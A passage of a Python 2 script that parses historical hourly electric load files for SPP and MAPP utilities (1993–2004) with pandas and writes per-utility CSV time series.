1994 : pd.read_fwf('%s/spp/1994/CLEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/CLEC96' % (fulldir)).readlines()[:]])[0].astype(float).values,
1997 : pd.read_csv('%s/spp/1997/CLEC97' % (fulldir)).iloc[:, 2].str.replace(',', '').astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/CLEC98' % (fulldir)).readlines()[:]])[1].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CLEC99' % (fulldir)).readlines()[1:]]).iloc[:, 0].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/CLEC01' % (fulldir)).readlines()[:]])[4].replace('NA', '0').astype(float).values,
},
5860 : {
1997 : pd.DataFrame([i.split() for i in open('%s/spp/1997/EMDE97' % (fulldir)).readlines()[:]])[3].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/EMDE98' % (fulldir)).readlines()[2:-2]])[2].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/EMDE99' % (fulldir)).readlines()[3:8763]])[2].astype(float).values,
2001 : pd.read_excel('%s/spp/2001/EMDE01' % (fulldir))['Load'].dropna().values,
2002 : pd.read_excel('%s/spp/2002/EMDE02' % (fulldir))['Load'].dropna().values,
2003 : pd.read_excel('%s/spp/2003/EMDE03' % (fulldir))['Load'].dropna().values,
2004 : pd.read_excel('%s/spp/2004/EMDE04' % (fulldir), skiprows=2).iloc[:8784, -1].values
},
12506 : {
1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/ENTR94' % (fulldir)).readlines()[:]]).iloc[:, 1:-1].astype(float).values.ravel(),
1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/ENTR95' % (fulldir)).readlines()[1:-2]]).iloc[:, 1:-1].astype(float).values.ravel(),
1997 : pd.read_csv('%s/spp/1997/ENTR97' % (fulldir), header=None).iloc[:, 1:-1].astype(float).values.ravel(),
1998 : pd.read_csv('%s/spp/1998/ENTR98' % (fulldir), header=None)[2].astype(float).values,
1999 : pd.read_excel('%s/spp/1999/ENTR99' % (fulldir)).iloc[:, -1].values,
2000 : pd.DataFrame([i.split() for i in open('%s/spp/2000/ENTR00' % (fulldir)).readlines()[4:]]).iloc[:, 3:].astype(float).values.ravel(),
2001 : pd.read_fwf('%s/spp/2001/ENTR01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
9996 : {
1994 : pd.read_fwf('%s/spp/1994/KCPU94' % (fulldir), skiprows=4, header=None).astype(str).apply(lambda x: x.str[-3:]).astype(float).values.ravel(),
1997 : pd.read_csv('%s/spp/1997/KCPU97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/KCPU98' % (fulldir), engine='python', header=None)[0].values,
1999 : pd.read_csv('%s/spp/1999/KCPU99' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
2000 : pd.read_csv('%s/spp/2000/KCPU00' % (fulldir), engine='python', header=None)[0].values,
2002 : pd.read_excel('%s/spp/2002/KCPU02' % (fulldir)).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/KCPU03' % (fulldir), engine='python', header=None)[0].values,
2004 : pd.read_csv('%s/spp/2004/KCPU04' % (fulldir), engine='python', header=None)[0].values
},
26253 : {
1993 : pd.read_csv('%s/spp/1993/LEPA93' % (fulldir), skiprows=3, header=None)[0].values,
1994 : pd.read_csv('%s/spp/1994/LEPA94' % (fulldir), skiprows=3, header=None)[0].values,
1995 : pd.read_csv('%s/spp/1995/LEPA95' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
1996 : pd.read_csv('%s/spp/1996/LEPA96' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
1997 : pd.read_csv('%s/spp/1997/LEPA97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/LEPA98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None),
1998 : pd.Series(pd.read_csv('%s/spp/1998/LEPA98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[[1,3]].values.ravel(order='F')).dropna().values,
1999 : pd.read_csv('%s/spp/1999/LEPA99' % (fulldir), sep='\t')['Load'].values,
2001 : pd.read_csv('%s/spp/2001/LEPA01' % (fulldir), engine='python', sep='\t', header=None)[1].values,
2002 : pd.read_csv('%s/spp/2002/LEPA02' % (fulldir), engine='python', sep='\t', header=None)[1].values,
2003 : pd.read_excel('%s/spp/2003/LEPA03' % (fulldir), header=None)[1].values
},
9096 : {
1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/LUS93' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/LUS94' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/LUS95' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/LUS96' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
1997 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1997/LUS97' % (fulldir)).readlines()[3:-2]]).iloc[:, -1].astype(float).values,
1998 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1998/LUS98' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
1999 : pd.DataFrame([i.split(' ') for i in open('%s/spp/1999/LUS99' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
2000 : pd.read_csv('%s/spp/2000/LUS00' % (fulldir), skiprows=3, skipfooter=1, header=None).iloc[:, -1].values,
2001 : pd.read_csv('%s/spp/2001/LUS01' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2002 : pd.read_csv('%s/spp/2002/LUS02' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/LUS03' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2004 : pd.read_csv('%s/spp/2004/LUS04' % (fulldir), skiprows=4, header=None).iloc[:, -1].values
},
55936 : {
1993 : pd.read_csv('%s/spp/1993/GSU93' % (fulldir), engine='python', header=None)[0].values
},
12699 : {
1993 : pd.read_csv('%s/spp/1993/MPS93' % (fulldir), sep=' ', skipinitialspace=True)['TOTLOAD'].values,
1996 : pd.read_excel('%s/spp/1996/MPS96' % (fulldir), skiprows=6, header=None).iloc[:, -1].values,
1998 : pd.read_csv('%s/spp/1998/MPS98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2000 : pd.read_csv('%s/spp/2000/MPS00' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2001 : pd.read_csv('%s/spp/2001/MPS01' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2002 : pd.read_csv('%s/spp/2002/MPS02' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2003 : pd.read_excel('%s/spp/2003/MPS03' % (fulldir)).iloc[:, 1:].values.ravel()
},
14063 : {
1994 : pd.read_csv('%s/spp/1994/OKGE94' % (fulldir), header=None).iloc[:, 1:13].values.ravel()
},
14077 : {
1993 : pd.read_csv('%s/spp/1993/OMPA93' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/spp/1997/OMPA97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/OMPA98' % (fulldir), skiprows=2, engine='python', header=None)[0].str.replace('\*', '').astype(float).values,
2000 : pd.read_csv('%s/spp/2000/OMPA00' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2001 : pd.read_csv('%s/spp/2001/OMPA01' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2002 : pd.read_csv('%s/spp/2002/OMPA02' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2003 : pd.read_csv('%s/spp/2003/OMPA03' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2004 : pd.read_csv('%s/spp/2004/OMPA04' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000
},
15474 : {
1993 : pd.read_fwf('%s/spp/1993/PSOK93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
18315 : {
1993 : pd.read_csv('%s/spp/1993/SEPC93' % (fulldir), header=None).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('NA', '').str.strip()).replace('', '0').astype(float).values.ravel(),
1997 : (pd.read_fwf('%s/spp/1997/SEPC97' % (fulldir), skiprows=1, header=None)[5]/1000).values,
1999 : pd.read_csv('%s/spp/1999/SEPC99' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].str.strip().replace('#VALUE!', '0').astype(float).values,
2000 : pd.read_csv('%s/spp/2000/SEPC00' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
2001 : pd.read_csv('%s/spp/2001/SEPC01' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
2002 : (pd.read_fwf('%s/spp/2002/SEPC02' % (fulldir), skiprows=1, header=None)[6]).str.replace('"', '').str.strip().astype(float).values,
2004 : pd.read_csv('%s/spp/2004/SEPC04' % (fulldir), header=None, sep='\t')[5].values
},
20447 : {
1993 : pd.read_csv('%s/spp/1993/WFEC93' % (fulldir)).iloc[:, 0].values,
2000 : pd.read_csv('%s/spp/2000/WFEC00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[0].values
},
20391 : {
1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/WPEK93' % (fulldir)).readlines()[:]]).iloc[:365, 1:25].astype(float).values.ravel(),
1996 : pd.read_excel('%s/spp/1996/WPEK96' % (fulldir), skiprows=2).dropna().iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/WPEK98' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2000 : pd.read_csv('%s/spp/2000/WPEK00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2001 : pd.read_csv('%s/spp/2001/WPEK01' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2002 : pd.read_csv('%s/spp/2002/WPEK02' % (fulldir), header=None, sep=' ', skipinitialspace=True)[4].values
},
3283 : {
1997 : pd.read_fwf('%s/spp/1997/CSWS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/CSWS98' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True, header=None)[2].values,
1999 : pd.read_csv('%s/spp/1999/CSWS99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[2].values,
2000 : pd.read_csv('%s/spp/2000/CSWS00' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None)[2].values
},
40233 : {
2000 : pd.read_fwf('%s/spp/2000/SRGT00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/spp/2001/SRGT01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
7349 : {
1997 : pd.read_csv('%s/spp/1997/GSEC97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/GSEC98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/spp/1999/GSEC99' % (fulldir), sep='\s', skipinitialspace=True, skiprows=2, header=None)[17].dropna().values,
2000 : pd.read_csv('%s/spp/2000/GSEC00' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/GSEC01' % (fulldir)).readlines()[1:]])[0].astype(float).values,
2002 : pd.read_csv('%s/spp/2002/GSEC02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[5].values,
2003 : pd.read_csv('%s/spp/2003/GSEC03' % (fulldir), header=None)[2].values,
2004 : (pd.read_csv('%s/spp/2004/GSEC04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[5]/1000).values
}
}
spp[9096][2003][spp[9096][2003] > 600] = 0
spp[9996][2002] = np.repeat(np.nan, len(spp[9996][2002]))
spp[7349][2003] = np.repeat(np.nan, len(spp[7349][2003]))
if not os.path.exists('./spp'):
os.mkdir('spp')
for k in spp.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(spp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(spp[k][i]))) for i in spp[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./spp/%s.csv' % k)
###### MAPP
# CIPC: 3258
# CP: 4322
# CBPC: 4363
# DPC: 4716
# HUC: 9130
# IES: 9219
# IPW: 9417 <- 9392
# IIGE: 9438
# LES: 11018
# MPL: 12647
# MPC: 12658
# MDU: 12819
# MEAN: 21352
# MPW: 13143
# NPPD: 13337
# NSP: 13781
# NWPS: 13809
# OPPD: 14127
# OTP: 14232
# SMMP: 40580
# UPA: 19514
# WPPI: 20858
# MEC: 12341 <- 9435
# CPA: 4322
# MWPS: 23333
mapp = {
3258 : {
1998 : pd.read_fwf('%s/mapp/1998/CIPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4322 : {
1993 : pd.read_fwf('%s/mapp/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CP96' % (fulldir), header=None).iloc[:, 2:].values.ravel()
},
4363 : {
1993 : pd.read_fwf('%s/mapp/1993/CBPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CBPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CBPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/CBPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/CBPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/CB02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
4716 : {
1993 : pd.read_fwf('%s/mapp/1993/DPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/DPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_csv('%s/mapp/1996/DPC96' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 6:].values.ravel()
},
9130 : {
1993 : pd.read_fwf('%s/mapp/1993/HUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/HUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/HUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/HUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/HUC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/HUC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/HUC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/HUC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9219 : {
1993 : pd.read_fwf('%s/mapp/1993/IESC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/IESC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/IES97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/IESC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9417 : {
1993 : pd.read_fwf('%s/mapp/1993/IPW93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IPW94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/IPW95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/IPW96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/IPW97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/IPW98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9438 : {
1993 : pd.read_fwf('%s/mapp/1993/IIGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IIGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/IIGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
11018 : {
1993 : pd.read_fwf('%s/mapp/1993/LES93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/LES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/LES95' % (fulldir)).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/LES96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/LES97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/LES98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/LES99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_excel('%s/mapp/2000/LES00' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
2001 : pd.read_excel('%s/mapp/2001/LES01' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/LES02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/LES03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
12647 : {
1995 : pd.read_fwf('%s/mapp/1995/MPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/MPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/mapp/2001/MPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
12658 : {
1993 : pd.read_fwf('%s/mapp/1993/MPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MPC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MPC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MPC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
12819 : {
1993 : pd.read_fwf('%s/mapp/1993/MDU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MDU94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MDU95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MDU96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MDU97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MDU98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MDU99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MDU02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MDU03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
21352 : {
1993 : pd.read_fwf('%s/mapp/1993/MEAN93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MEAN95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MEAN96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MEAN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
